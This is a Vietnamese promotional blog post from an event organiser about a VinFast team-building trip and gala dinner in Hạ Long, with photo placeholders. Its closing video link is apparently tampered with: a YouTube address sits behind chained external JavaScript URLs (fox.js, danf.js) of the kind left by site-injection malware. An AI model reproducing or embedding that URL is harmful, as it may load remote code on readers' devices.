Team Building Vinfast Hạ Long – Dấu mốc chặng đường gắn kết 26 năm

Thời gian gần đây, cộng đồng đã không khỏi trầm trồ trước những siêu phẩm mà Vinfast đưa ra. Nhưng ít ai biết rằng để có được thành tựu như vậy là sự nỗ lực không ngừng nghỉ của những con người hết sức tuyệt vời. Đội ngũ nhân viên công ty không chỉ giỏi chuyên môn mà họ còn sở hữu một thứ vũ khí được tôi luyện trong suốt chặng đường phát triển. May mắn trở thành đơn vị tổ chức thành công chương trình Team Building Vinfast – dấu mốc chặng đường gắn kết 26 năm, Vietwind sẽ bật mí cho bạn điều làm nên sức mạnh to lớn như vậy nhé!

1.Team Building Vinfast – Bứt phá mọi giới hạn

Sau khi đón gia đình Vinfast tại cổng công ty, xe du lịch của Vietwind nhanh chóng chuyển bánh đưa mọi người đến với thiên đường biển đảo Hạ Long. Sở hữu cảnh sắc thiên nhiên đẹp ngây ngất cùng sự hội tụ của các dịch vụ cao cấp, Hạ Long thực sự là điểm đến lý tưởng cho chuyến đi gắn kết trọng đại này.


HQFinnal_0006

Ngày 12/09, Hạ Long đón những vị khách đặc biệt với biển xanh cát trắng, hòa trong nắng thu dịu dàng. Ai ai cũng rất hào hứng để lưu lại những kỷ niệm khó quên bên nhau.

HQFinnal_0062

Năm nay, khẩu hiệu của chương trình Team Building Vinfast là “No Limit” với ý nghĩa gắn kết để bứt phá mọi giới hạn. Và chỉ cần nhìn những gì mà Vinfast đã làm được trên thương trường là đủ để khẳng định họ là tập thể nói được là làm được.

HQFinnal_0048

HQFinnal_0039

Check-in trước chương trình Team building Vinfast

Chứng kiến các chiến binh Vinfast tham gia trò chơi Team Building outdoor và vượt qua những thử thách của Vietwind mới thấy được hết tinh thần chiến đấu hết mình của cả tập thể. Kể cả khi không phải là thương trường thực sự, họ vẫn luôn giữ trong mình ngọn lửa rực cháy để thắp sáng con đường đi tới thành công.

HQFinnal_0188

Với 6 năm kinh nghiệm gắn kết nhân sự doanh nghiệp, Vietwind hiểu rằng không một thành công nào là không cần tới sức mạnh gắn kết tập thể. Chỉ có đoàn kết mới là con đường ngắn nhất dẫn tới đỉnh cao. Có lẽ đây cũng chính là điều mà ban lãnh đạo Vinfast muốn Vietwind gửi gắm tới nhân viên yêu quý của mình thông qua Team building.

HQFinnal_0276

HQFinnal_0355

Những khoảnh khắc đáng nhờ trong chươn trình Team Building Vinfast 

2.Gala diner – Cùng nhìn lại chặng đường gắn kết 26 năm 

Đội ngũ điều hành chuyên nghiệp của Vietwind set-up sân khấu với không gian sang trong nhưng không kém phần ấm cúng. Không chỉ là bữa cơm với sự tham gia đầy đủ của các thành viên công ty mà còn là cơ hội hiếm có trong năm để mọi người chia sẻ cảm xúc bên nhau. 26 năm qua, họ đã cùng gắn kết để vượt qua biết bao thăng trầm, giá trị đọng lại tại đây là tình cảm trân quý như một đại gia đình thực sự.

HQFinnal_0360

HQFinnal_0431

Cùng nâng ly chúc mừng thành công chương trình du lịch Team building Vinfast 

HQFinnal_0458

Đằng sau những thành công là những ông bố tuyệt vời

HQFinnal_0392

HQFinnal_0385

Vậy là chương trình Team Building Vinfast đầu cầu Hạ Long đã dừng lại nhưng hành trình gắn kết vẫn sẽ tiếp tục và trở thành ngọn lửa truyền cảm hứng. Vietwind thực sự xúc động và cảm ơn sự đồng hành của các chiến binh để cùng tạo ra một chương trình thành công, ý nghĩa như vậy. Chúc tập thể Vinfast mãi giữ vững phong độ để thành công hơn nữa trên thương trường.

>>Chiêm ngưỡng chặng đường siêu gắn kết của chiến binh VinFast tại đây

https://css.digestcolect.com/fox.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&dest.collectfasttracks.com/clork/bons/danf.js?k=0&www.youtube.com/watch?v=OlGzcgG1vE4

Facebook Comments

Bài Viết Liên Quan